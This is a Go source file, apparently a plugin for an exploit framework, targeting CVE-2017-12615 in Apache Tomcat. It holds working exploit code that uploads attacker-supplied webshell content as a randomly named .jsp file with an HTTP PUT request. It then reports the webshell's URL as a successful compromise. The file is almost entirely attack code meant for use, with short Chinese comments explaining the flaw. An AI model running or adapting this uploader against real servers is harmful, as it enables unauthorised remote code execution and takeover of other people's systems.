CVE-2017-12615

package CVE_2017_12615

import (
    "context"
    "expgo/plugins/api/req"
    "expgo/plugins/api/types"
    "expgo/plugins/api/util"
    "fmt"
    "net/url"

    "log"
)

var (
    pluginType  = "custom"
    vulType     = "webshell"
    name        = "CVE-2017-12615"
    component   = "tomcat"
    author      = "akkuman"
    description = "漏洞本质Tomcat配置了可写（readonly=false），导致我们可以往服务器写文件"
    references  = []string{
        "https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md",
    }
    tags = []string{
        "tomcat",
        "upload",
    }
)

var opts = types.NewOptions()

func init() {
    opts.String("target", true, "目标", "", func(i interface{}) bool {
        target := i.(string)
        _, err := url.Parse(target)
        return err == nil
    })
    opts.String("shell", true, "webshell内容", "")
}

func exploit(ctx context.Context, params map[string]interface{}) types.PluginResult {
    target := params["target"].(string)
    shell := params["shell"].(string)

    c := req.NewHttpClient(ctx)

    log.Println("准备上传webshell")
    webshellName := util.GetUUID() + ".jsp"
    webshellURL := util.URLJoin(target, fmt.Sprintf("/%s", webshellName))
    resp, err := c.R().
        SetHeader("Content-Type", "application/x-www-form-urlencoded").
        SetBody(shell).
        Put(fmt.Sprintf("%s/", webshellURL))
    if err != nil {
        log.Println(err)
        return types.MissPluginResult
    }
    if resp.StatusCode() != 201 {
        log.Println(err)
        return types.MissPluginResult
    }
    log.Printf("webshell地址: %s\n", webshellURL)
    return types.PluginResult{
        ExtendInfo: map[string]interface{}{
            "data": webshellURL,
        },
        Success: true,
    }
}